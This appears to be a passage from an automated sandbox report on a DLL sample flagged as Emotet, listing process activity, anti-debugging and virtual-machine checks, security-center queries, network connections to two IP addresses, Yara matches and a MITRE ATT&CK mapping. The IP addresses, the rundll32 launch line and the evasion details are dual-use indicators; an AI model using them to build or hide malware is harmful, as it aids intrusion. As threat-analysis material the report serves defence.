Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 6448

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_5-18318
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_5-18341
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_6-21562

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 4.9 %

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_5-18343
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_6-21140

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: VMware
Source: Amcache.hve.18.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.18.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.18.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.18.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: svchost.exe, 00000000.00000002.679522004.0000017948C02000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000001B.00000002.428874939.000001BC56084000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.429490850.000001BC560EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.18.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.18.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.18.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.18.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: svchost.exe, 00000000.00000002.679644301.0000017948C28000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.679752634.000001EEFC837000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.679837307.0000014F18429000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.18.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_1002DB0D

Source: C:\Windows\SysWOW64\regsvr32.exe

5_2_1003E278

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_10002D40 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

5_2_10002D40

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3F7F7 mov eax, dword ptr fs:[00000030h]		1_2_02B3F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0F7F7 mov eax, dword ptr fs:[00000030h]		8_2_04E0F7F7

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_02B3C6B8 LdrInitializeThunk,

1_2_02B3C6B8

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_1003A8D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_1002DB0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_10032CB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1003A8D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_1002DB0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_10032CB9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6788 -ip 6788	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6788 -s 512	Jump to behavior

Source: loaddll32.exe, 00000001.00000000.298555349.0000000001670000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.296585233.0000000001670000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.681257947.0000000003960000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680909111.0000014E73F90000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000000.298555349.0000000001670000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.296585233.0000000001670000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.681257947.0000000003960000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680909111.0000014E73F90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000000.298555349.0000000001670000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.296585233.0000000001670000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.681257947.0000000003960000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680909111.0000014E73F90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000000.298555349.0000000001670000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.296585233.0000000001670000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.681257947.0000000003960000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680909111.0000014E73F90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	5_2_1003E000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	5_2_1003D098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,	5_2_1002129B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	5_2_1003D35E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	5_2_1003850E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	5_2_1003D7AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_1003C7D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_1003D8C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	5_2_1003D95D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	5_2_1003D9D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	5_2_1003F9F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	5_2_1003EA86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	5_2_1003EABA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_1003DBA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_1003EBF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_1003DC64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_1003DCCB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	5_2_1003DD07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	6_2_1003E000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	6_2_1003D098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,	6_2_1002129B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	6_2_1003D35E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	6_2_1003850E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	6_2_1003D7AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_1003C7D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_1003D8C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	6_2_1003D95D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_1003D9D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	6_2_1003F9F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	6_2_1003EA86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	6_2_1003EABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_1003DBA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_1003EBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_1003DC64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_1003DCCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	6_2_1003DD07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	6_2_1003CE40

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1003732F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_1003732F

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_10024F01 _memset,GetVersionExA,

6_2_10024F01

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: svchost.exe, 0000000E.00000002.679805770.0000020AA0C3D000.00000004.00000001.sdmp	Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.679936943.0000020AA0D02000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.4dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.32f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5610000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.2b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.32f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.4940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.4940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.34c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.2b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5640000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5380000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4dd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.336582284.00000000054B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336161253.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.296629194.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336665007.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336717142.0000000005641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.680318843.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336600440.00000000054E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.296654820.0000000002B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336482614.0000000005380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.321734731.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336517253.00000000053B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.290395049.0000000004991000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.680592852.00000000034C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.339368070.0000000004971000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.339330671.0000000004940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.299013072.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.299132771.0000000002B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.290320378.0000000004960000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		5_2_10001160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		6_2_10001160

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API2	Boot or Logon Initialization Scripts	Process Injection112	Deobfuscate/Decode Files or Information1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	System Information Discovery25	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery51	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Virtualization/Sandbox Evasion2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
